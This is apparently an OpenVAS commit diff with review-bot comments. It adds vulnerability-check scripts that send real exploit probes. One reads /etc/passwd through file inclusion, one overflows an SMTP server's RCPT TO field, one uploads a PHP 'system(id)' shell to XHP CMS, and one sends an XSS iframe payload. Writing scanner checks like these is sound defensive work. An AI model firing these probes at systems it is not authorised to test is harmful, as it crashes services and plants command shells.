+ script_version("$Revision: 1.0 $");
+
+ script_cve_id("CVE-2006-2009");
+ script_bugtraq_id(17670);
+
+ name["english"] = "phpMyAgenda version 3.0 File Inclusion Vulnerability";
+ script_name(english:name["english"]);
+ desc["english"] = "
+Synopsis :
+
+The remote web server contains a PHP application that is prone to
+remote and local file inclusions attacks.
+
+Description :
+
+phpMyAgenda is installed on the remote system. It's an open source
+event management system written in PHP.
+
+The application does not sanitize the 'rootagenda' parameter in some
+of it's files. This allows an attacker to include arbitrary files from
+remote systems and parse them with privileges of the account under
+which the web server is started.
+
+This vulnerability exists if PHP's 'register_globals' & 'magic_quotes_gpc'
+are both enabled for the local file inclusions flaw.
+And if 'allow_url_fopen' is also enabled remote file inclusions are also
+possible.
+
+See also :
+
+http://www.securityfocus.com/archive/1/431862/30/0/threaded
+
+Solution :
+
+No patch information provided at this time.
+Disable PHP's 'register_globals'
+
+Risk factor :
+
+High / CVSS Base Score : 7
+(AV:R/AC:L/Au:NR/C:P/A:P/I:P/B:N)";
+ script_description(english:desc["english"]);
+ summary["english"] = "Checks for a possible file inclusion flaw in phpMyAgenda";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_ATTACK);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencie("http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+if (!get_port_state(port)) exit(0);
+if (!can_host_php(port:port)) exit(0);
+
+if (thorough_tests) dirs = make_list("/phpmyagenda", "/agenda", cgi_dirs());
+else dirs = make_list(cgi_dirs());
+
+foreach dir (dirs) {
+ res = http_get_cache(item:string(dir, "/agenda.php3"), port:port);
+ #debug_print("res: ", res, "\n");
+
+ if(egrep(pattern:"<a href=[^?]+\?modeagenda=calendar", string:res)) {
+ file[0] = string("http://", get_host_name(), dir, "/bugreport.txt");
+ file[1] = "/etc/passwd";
+
+ req = http_get(item:string(dir, "/infoevent.php3?rootagenda=", file[0], "%00"), port:port);
+ #debug_print("request1= ", req, "\n");
+
+ recv = http_keepalive_send_recv(data:req, bodyonly:TRUE, port:port);
+ #debug_print("receive1= ", recv, "\n");
+ if (recv == NULL) exit(0);
+
+ if ("Bug report for phpMyAgenda" >< recv) {
+ security_hole(port);
+ exit(0);
+ }
+ else {
+ # Maybe PHP's 'allow_url_fopen' is set to Off on the remote host.
+ # In this case, try a local file inclusion.
+ req2 = http_get(item:string(dir, "/infoevent.php3?rootagenda=", file[1], "%00"), port:port);
+ #debug_print("request2= ", req2, "\n");
+
+ recv2 = http_keepalive_send_recv(data:req2, bodyonly:TRUE, port:port);
+ #debug_print("receive2= ", recv2, "\n");
+ if (recv2 == NULL) exit(0);
+
+ if (egrep(pattern:"root:.*:0:[01]:.*:", string:recv2)) {
+ # PHP's 'register_globals' and 'magic_quotes_gpc' are enabled on the remote host.
+ security_hole(port);
+ exit(0);
+ }
+ }
+ }
+}
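Review bot: The five `#debug_print(...)` lines are commented-out code; eyeos_command_execution.nasl in this commit keeps its `debug_print` calls live, which is the better pattern because `debug_print` is already gated by the debug level, so either restore them or delete them. The `%00` suffix appended to both probes is load-bearing but undocumented; a comment like `# %00 truncates the path the application appends; on PHP builds that ignore NUL bytes a miss here is inconclusive.` near the `else` branch would explain why a negative result does not clear the host.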
Added: trunk/openvas-plugins/scripts/php_fusion_6_00_206_sql_injection.nasl
===================================================================
--- trunk/openvas-plugins/scripts/php_fusion_6_00_206_sql_injection.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/php_fusion_6_00_206_sql_injection.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,117 @@
+#
+# Script Written By Ferdy Riphagen
+# <f[dot]riphagen[at]nsec[dot]nl>
+#
+# Script distributed under the GNU GPLv2 License.
+#
+
+desc["english"] = "
+Synopsis :
+
+The remote web server contains a PHP script that is prone to SQL
+injection attacks.
+
+Description :
+
+PHP-Fusion is installed on the remote system.
+It is a light-weight open-source content management system (CMS).
+
+A vulnerability is reported in the forum module of PHP-Fusion
+6.00.206 and some early released versions.
+When the forum module is activated, a registered user
+can execute arbitrary SQL injection commands.
+
+The failure exists because the application does not properly
+sanitize user-supplied input in 'options.php' and 'viewforum.php'
+before using it in the SQL query, and magic_quotes_gpc is set to off.
+
+See also :
+
+http://www.securityfocus.com/bid/15502
+http://secunia.com/advisories/17664/
+
+Solution :
+
+Apply the patch from the php-fusion main site:
+http://www.php-fusion.co.uk/downloads.php?cat_id=3
+
+Risk factor :
+
+Medium";
+
+
+if (description) {
+script_id(200010);
+script_version("$Revision: 1.0 $");
+
+script_cve_id("CVE-2005-3740");
+script_bugtraq_id(15502);
+
+name["english"] = "PHP-Fusion <= 6.00.206 Forum SQL Injection Vulnerability";
+script_name(english:name["english"]);
+
+script_description(english:desc["english"]);
+
+summary["english"] = "Check if PHP-Fusion is vulnerable to SQL Injection attacks";
+script_summary(english:summary["english"]);
+
+script_category(ACT_ATTACK);
+script_family(english:"CGI abuses");
+
+script_copyright(english:"This script is Copyright (C) 2005 Ferdy Riphagen");
+
+script_dependencie("http_version.nasl");
+script_require_ports("Services/www", 80);
+script_exclude_keys("Settings/disable_cgi_scanning");
+
+exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+if (!get_port_state(port)) exit(0);
+if (!can_host_php(port:port)) exit(0);
+
+if (thorough_tests) dirs = make_list("/php-files", "/forum", "/", "/fusion", cgi_dirs());
+else dirs = make_list(cgi_dirs());
+
+foreach dir (dirs)
+{
+ # Check if PHP-Fusion exists.
+ res = http_get_cache(item:string(dir, "/news.php"), port:port);
+ if (res == NULL) exit(0);
+
+ # Check for the vulnerable versions.
+ if (egrep(pattern: ">Powered by.*PHP-Fusion.*v([45]\.0[01])|6\.(00\.(1[01][56790]|20[46]))", string: res))
+ {
+ line = egrep(pattern: ">Powered by.*PHP-Fusion", string: res);
+
+ note = string(
+ "***** Nessus has determined that the vulnerable PHP-Fusion version\n",
+ "***** is installed on the remote host by checking its version number.\n",
+ "***** This might be an false positive.\n");
+
+ # Check and build the version.
+ version = ereg_replace(pattern:".*>Powered by.* v([0-9.]+).*", string:line, replace:"\1");
+ if (version != line)
+ {
+ # Build the report.
+ report = string(
+ desc["english"], "\n\n",
+ "Plugin output :\n\n",
+ "PHP-Fusion is installed on the remote system.\n",
+ "The version of the application is:\n",
+ "PHP-Fusion v", version, "\n\n",
+ "Note :\n\n", note);
+ }
+ else report =string(
+ desc["english"], "\n\n",
+ "Note :\n\n", note);
+
+ security_warning(port:port, data:report);
+ exit(0);
+ }
+}
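Review bot: The version regex in the `egrep` call has an unparenthesised top-level `|`, so its right-hand branch `6\.(00\.(1[01][56790]|20[46]))` matches a bare version string anywhere in the page without the `>Powered by.*PHP-Fusion.*v` prefix; group the alternatives, e.g. `pattern: ">Powered by.*PHP-Fusion.*v(([45]\.0[01])|(6\.00\.(1[01][56790]|20[46])))"`. The body of `if (description)` is also the only one in this commit written at column 0, which hides the block structure.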
Added: trunk/openvas-plugins/scripts/qk_smtp_server_dos.nasl
===================================================================
--- trunk/openvas-plugins/scripts/qk_smtp_server_dos.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/qk_smtp_server_dos.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,103 @@
+#
+# Script Written By Ferdy Riphagen
+# Script distributed under the GNU GPLv2 License.
+#
+
+if (description) {
+ script_id(2000201);
+ script_version("$Revision: 1.0 $");
+
+ script_cve_id("CVE-2006-5551");
+ script_bugtraq_id(20681);
+
+ name["english"] = "QK SMTP Server 'RCPT TO' buffer overflow vulnerability";
+ script_name(english:name["english"]);
+ desc["english"] = "
+Synopsis :
+
+The remote SMTP server is prone to a stack based overflow.
+
+Description :
+
+QK SMTP Server is installed on the remote host.
+The application does not properly check it's boundaries for
+user supplied input in the 'RCPT TO' field.
+
+This results in a stack based overflow, where it's possible to
+crash the service or compromise the host.
+
+See also :
+
+http://www.securiteam.com/exploits/6P00O15H6U.html
+
+Solution :
+
+Upgrade to QK SMTP Server 3.1 beta or a newer release.
+
+Risk factor :
+
+Critical / CVSS Base Score : 10
+(AV:R/AC:L/Au:NR/C:C/A:C/I:C/B:N)";
+ script_description(english:desc["english"]);
+ summary["english"] = "Checks for the presence of a buffer overflow in QK SMTP Server";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_DENIAL);
+ script_family(english:"Gain root remotely");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencies("smtpserver_detect.nasl", "smtp_settings.nasl");
+ script_require_ports("Services/smtp", 25);
+ exit(0);
+}
+
+include("smtp_func.inc");
+
+port = get_kb_item("Services/smtp");
+if (!port) port = 25;
+if (!get_port_state(port)) exit(0);
+
+soc = open_sock_tcp(port);
+if (!soc) exit(0);
+
+banner = smtp_recv_banner(socket:soc);
+if ("QK SMTP Server" >< banner) {
+
+ # This works regardless of the results from smtp_settings.nasl.
+ domain = get_kb_item("Settings/third_party_domain");
+ sender = get_kb_item("SMTP/headers/From");
+ helo = string("EHLO ", domain, "\r\n");
+ from = string("MAIL FROM: ", sender, "\r\n");
+ bof = string("RCPT TO: ", crap(data:raw_string(0x41), length:4500), "@", domain, "\r\n");
+
+ # First send the HELO
+ send(socket:soc, data:helo);
+ recv = recv(socket:soc, length:1024);
+ if ("250-Hello" >!< recv) exit(0);
+
+ # From address
+ send(socket:soc, data:from);
+ recv = recv(socket:soc, length:1024);
+ if ("Address Okay" >!< recv) exit(0);
+
+ # The overflow
+ send(socket:soc, data:bof);
+ recv = recv(socket:soc, length:1024);
+ if (soc) {
+ send(socket:soc, data:string("QUIT\r\n"));
+ close(soc);
+ }
+
+ # try to re-open the connection and get some data from it.
+ soc = open_sock_tcp(port);
+ if (soc) {
+ line = smtp_recv_line(socket:soc, code:"220");
+ }
+ if (!soc || (!strlen(line))) {
+ security_hole(port);
+ }
+ if (soc) {
+ send(socket:soc, data:string("QUIT\r\n"));
+ close(soc);
+ }
+}
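Review bot: `domain` and `sender` are read from the KB and used unchecked in the `EHLO` and `MAIL FROM` lines, yet the comment above them claims the plugin works regardless of smtp_settings.nasl; if either key is missing the server may reject the greeting or sender, the plugin then exits at the `250-Hello` or `Address Okay` check, and the host is silently reported clean. Give them explicit defaults, e.g. `if (!domain) domain = "example.com";` (placeholder value) and `if (!sender) sender = string("nessus@", domain);`, or reword the comment to state the dependency. The value assigned to `recv` after the overflow is sent is never inspected, so that line can become a bare `recv(socket:soc, length:1024);` as the freesshd plugin does.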
Added: trunk/openvas-plugins/scripts/sip.inc
===================================================================
--- trunk/openvas-plugins/scripts/sip.inc 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/sip.inc 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,77 @@
+#
+# (C) 2007 Ferdy Riphagen <f.riphagen at nsec.nl>
+#
+# $Revision: 1.0 $
+# GPLv2
+#
+# Experimental!
+#
+
+#--------------------------------------------------------#
+# function get_sip_banner: #
+# Some function code taken from 'sip_detection.nasl' #
+# (C) 2006 Josh Zlatin-Amishav and Ferdy Riphagen #
+#--------------------------------------------------------#
+
+function get_sip_banner(port) {
+ local_var soc, opt, r, banner;
+ global_var port;
+
+ banner = get_kb_item(strcat("sip/banner/", port));
+ if (banner) return banner;
+
+ if (islocalhost()) soc = open_sock_udp(port);
+ else soc = open_priv_sock_udp(sport:5060, dport:port);
+ if (!soc) return NULL;
+
+ opt = string(
+ "OPTIONS sip:", get_host_name(), " SIP/2.0", "\r\n",
+ "Via: SIP/2.0/UDP ", this_host(), ":", port, "\r\n",
+ "Max-Forwards: 70\r\n",
+ "To: <sip:", this_host(), ":", port, ">\r\n",
+ "From: Nessus <sip:", this_host(), ":", port, ">\r\n",
+ "Call-ID: ", rand(), "\r\n",
+ "CSeq: 63104 OPTIONS\r\n",
+ "Contact: <sip:", this_host(), ">\r\n",
+ "Accept: application/sdp\r\n",
+ "Content-Length: 0\r\n\r\n");
+
+ send(socket:soc, data:opt);
+ r = recv(socket:soc, length:1024);
+
+ if ("SIP/2.0" >< r && ("Server:" >< r)) {
+ banner = egrep(pattern:'^Server:', string:r);
+ banner = substr(banner, 8);
+ }
+ else if ("SIP/2.0" >< r && ("User-Agent" >< r)) {
+ banner = egrep(pattern:'^User-Agent', string:r);
+ banner = substr(banner, 12);
+ }
+
+ if (!isnull(banner)) return banner;
+ else return NULL;
+}
+
+
+#--------------------------------------------------------#
+# function sip_send_recv: #
+# Send self modified SIP packets #
+# returns received packets #
+#--------------------------------------------------------#
+
+function sip_send_recv(port, data) {
+ local_var ret, soc;
+ global_var port, data;
+
+ if (islocalhost()) soc = open_sock_udp(port);
+ else soc = open_priv_sock_udp(sport:5060, dport:port);
+ if (!soc) return NULL;
+
+ if (soc) {
+ send(socket:soc, data:data);
+ ret = recv(socket:soc, length:1024);
+ if (!isnull(ret)) return ret;
+ }
+ return NULL;
+}
+
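Review bot: Both functions re-declare their own parameters as globals — `global_var port;` in `get_sip_banner` and `global_var port, data;` in `sip_send_recv` — which makes it ambiguous whether the body reads the argument or a script-level variable of the same name; the parameters are already in scope, so both `global_var` lines should be removed. In `sip_send_recv` the `if (soc) {` guard is redundant directly after `if (!soc) return NULL;`. `get_sip_banner` reads `sip/banner/<port>` from the KB but never writes it back after a successful probe, so the cache only helps if some other plugin fills it; either add a `set_kb_item` before the return or name that plugin in the header comment.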
Added: trunk/openvas-plugins/scripts/xhp_cms_file_upload.nasl
===================================================================
--- trunk/openvas-plugins/scripts/xhp_cms_file_upload.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/xhp_cms_file_upload.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,139 @@
+#
+# Script Written By Ferdy Riphagen
+#
+# Script distributed under the GNU GPLv2 License.
+#
+# Original advisory by : rgod
+# http://retrogod.altervista.org/XHP_CMS_05_xpl.html
+#
+
+desc["english"] = "
+Synopsis :
+
+The remote webserver is hosting a PHP script which
+is vulnerable to a unrestricted file upload flaw.
+
+Description :
+
+XHP CMS is installed on the remote system.
+The installed application does not authenticate users to access
+the FileManager scripts located at:
+
+'/inc/htmlarea/plugins/FileManager/manager.php'
+
+and
+
+'/inc/htmlarea/plugins/FileManager/standalonemanager.php'
+
+This allows an attacker to upload content to the webserver, and
+execute arbitrary commands with privileges of the webserver account.
+
+See also :
+
+http://www.securityfocus.com/bid/17209
+http://xhp.targetit.ro/index.php?page=3&box_id=34&action=show_single_entry&post_id=10
+
+Solution :
+
+Upgrade to version 0.51 or a newer release.
+
+Risk factor :
+
+High / CVSS Base Score : 7
+(AV:R/AC:L/Au:NR/C:P/A:P/I:P/B:N)";
+script_description(english:desc["english"]);
+
+if (description) {
+ script_id(200100);
+ script_version("$Revision: 1.0 $");
+
+ script_cve_id("CVE-2006-1371");
+ script_bugtraq_id(17209);
+ if (defined_func("script_xref")) {
+ script_xref(name:"OSVDB", value:"24058");
+ script_xref(name:"OSVDB", value:"24059");
+ }
+
+ name["english"] = "XHP CMS Version <= 0.5 File Upload Vulnerability";
+ script_name(english:name["english"]);
+ summary["english"] = "Checks for a arbitrary file upload and execution flaws";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_DESTRUCTIVE_ATTACK);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencie("http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+if (!get_port_state(port)) exit(0);
+if (!can_host_php(port:port)) exit(0);
+
+if (thorough_tests) dirs = make_list("/xhp", "/xhpcms", cgi_dirs());
+else dirs = make_list("/test/xhp", cgi_dirs());
+
+foreach dir (dirs) {
+ res = http_get_cache(item:string(dir, "/inc/htmlarea/plugins/FileManager/standalonemanager.php"), port:port);
+ if ("XHP File Manager" >!< res) exit(0);
+
+ if (!safe_checks()) {
+ rand = rand();
+ file = string("DELETE_FILE_", rand, ".php");
+ content = "<?php system(id); ?>";
+
+ exp = string(
+ "--", rand, "\r\n",
+ 'Content-Disposition: form-data; name="dir"', "\r\n\r\n",
+ "/\r\n",
+ "--", rand, "\r\n",
+ 'Content-Disposition: form-data; name="upload"; filename="', file, '"', "\r\n",
+ "Content-Type: text/plain\r\n\r\n",
+ content, "\r\n",
+ "--", rand, "\r\n",
+ 'Content-Disposition: form-data; name="submit"', "\r\n\r\n",
+ "Upload\r\n",
+ "--", rand, "--\r\n");
+
+ req = string(
+ "POST ", dir, "/inc/htmlarea/plugins/FileManager/images.php HTTP/1.1\r\n",
+ "Content-Type: multipart/form-data; boundary=", rand, "\r\n",
+ "Host: ", get_host_name(), "\r\n",
+ "Content-Length: ", strlen(exp), "\r\n",
+ "Connection: close\r\n\r\n",
+ exp);
+ recv = http_keepalive_send_recv(data:req, port:port, bodyonly:TRUE);
+
+ req2 = http_get(item:string(dir, "/filemanager/", file), port:port);
+ recv2 = http_keepalive_send_recv(data:req2, port:port, bodyonly:TRUE);
+
+ if (recv2 == NULL) exit(0);
+ if(egrep(pattern:"uid=[0-9]+.*gid=[0-9]+", string:recv2)) {
+ report = string(
+ desc["english"], "\n\n",
+ "Note :\n\n",
+ "## It was possible to upload and execute a file on the remote webserver.\n",
+ "## The file is placed in directory: ", '"', dir, "/filemanager/", '"', "\n",
+ "## and is named: ", '"', file, '"', "\n\n",
+ "## You should delete this file as soon as possible !!!\n");
+
+ security_hole(port:port, data:report);
+ exit(0);
+ }
+ }
+ else {
+ req = http_get_cache(item:string(dir, "/index.php"), port:port);
+
+ if (egrep(pattern:"<a href[^>]+>Powered by XHP CMS v0\.(4\.1|5)", string:req)) {
+ security_hole(port:port, data:desc["english"]);
+ exit(0);
+ }
+ }
+}
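Review bot: The payload `content = "<?php system(id); ?>";` leaves an unauthenticated command-execution shell under `dir/filemanager/` on the target once the check finishes; the report only asks the operator to delete it, and anyone who guesses or observes the name can run commands in the meantime. Proving code execution does not require a shell: upload `content = string("<?php echo 'OVAS-", rand, "'; ?>");` and replace the uid/gid egrep with `if (string("OVAS-", rand) >< recv2) {`, which also drops the reliance on the bareword `id` constant. Separately, `if ("XHP File Manager" >!< res) exit(0);` inside the foreach aborts the whole scan on the first directory that is not XHP, so the remaining entries of dirs are never tested; that should be `continue;`. I cannot confirm from the diff alone that images.php is the upload endpoint the advisory describes, since the description names manager.php and standalonemanager.php.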
Added: trunk/openvas-plugins/scripts/zeroblog_xss.nasl
===================================================================
--- trunk/openvas-plugins/scripts/zeroblog_xss.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/zeroblog_xss.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,89 @@
+#
+# Script Written By Ferdy Riphagen
+# <f(dot)riphagen(at)nsec(dot)nl>
+#
+# This script is released under the GNU GPLv2
+#
+
+if (description) {
+script_id(200003);
+script_version("$Revision: 1.0 $");
+
+script_bugtraq_id(15078);
+
+name["english"] = "Zeroblog <= 1.2a Cross-Site Scripting Vulnerability";
+script_name(english:name["english"]);
+
+desc["english"] = "
+Synopsis :
+
+The remote host contains a PHP script that is vulnerable to cross-site
+scripting attacks.
+
+Description :
+
+The remote host appears to be running ZeroBlog.
+
+A vulnerability was identified in Zeroblog, which may be exploited by
+remote attackers to inject script code.
+
+ZeroBlog does not properly sanitize user input in the 'threadID', 'replyID' and 'albumID' parameters.
+
+Solution :
+
+Unknown at this time.
+
+Risk factor :
+
+Low";
+script_description(english:desc["english"]);
+
+summary["english"] = "Check if Zeroblog is vulnerable to cross-site scripting attacks.";
+script_summary(english:summary["english"]);
+
+script_category(ACT_GATHER_INFO);
+script_family(english:"CGI abuses : XSS");
+
+script_copyright(english:"This script is Copyright (C) 2005 Ferdy Riphagen");
+
+script_dependencie("http_version.nasl");
+script_require_ports("Services/www", 80);
+
+exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+include("url_func.inc");
+
+port = get_http_port(default:80);
+if (!get_port_state(port)) exit(0);
+if (!can_host_php(port:port)) exit(0);
+if (get_kb_item("www/", port, "/generic_xss")) exit(0);
+
+xss = "'<IFRAME SRC=javascript:alert(%27XSS DETECTED BY NESSUS%27)></IFRAME>";
+exss = urlencode(str:xss);
+
+if (thorough_tests) dirs = make_list("/zeroblog", "/", "/blog", cgi_dirs());
+else dirs = make_list(cgi_dirs());
+
+foreach dir (dirs)
+{
+ res = http_get_cache(item:string(dir, "/thread.php"), port:port);
+ if (res == NULL) exit(0);
+
+ if (egrep(pattern:">.*Copyright.*(C).*ZeroCom.*computers", string:res))
+ {
+ req = http_get(item:string(dir, "/thread.php?threadID=", exss), port:port);
+
+ recv = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
+ if(recv == NULL)exit(0);
+
+ if(xss >< recv)
+ {
+ security_note(port);
+ exit(0);
+ }
+ }
+}
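Review bot: The generic-XSS guard `if (get_kb_item("www/", port, "/generic_xss")) exit(0);` passes three separate arguments, and as far as I can tell get_kb_item only reads its first, so the lookup is for the key "www/" and the guard never fires on hosts already flagged as reflecting any input; build the key first, `if (get_kb_item(string("www/", port, "/generic_xss"))) exit(0);`. Unlike xhp_cms_file_upload.nasl in the same commit, this script omits `script_exclude_keys("Settings/disable_cgi_scanning");`, so it still runs when the operator has disabled CGI scanning. The fingerprint regex `(C)` is a capture group matching a bare C rather than the literal "(C)", which is harmless but probably not what was intended; `\(C\)` would pin it.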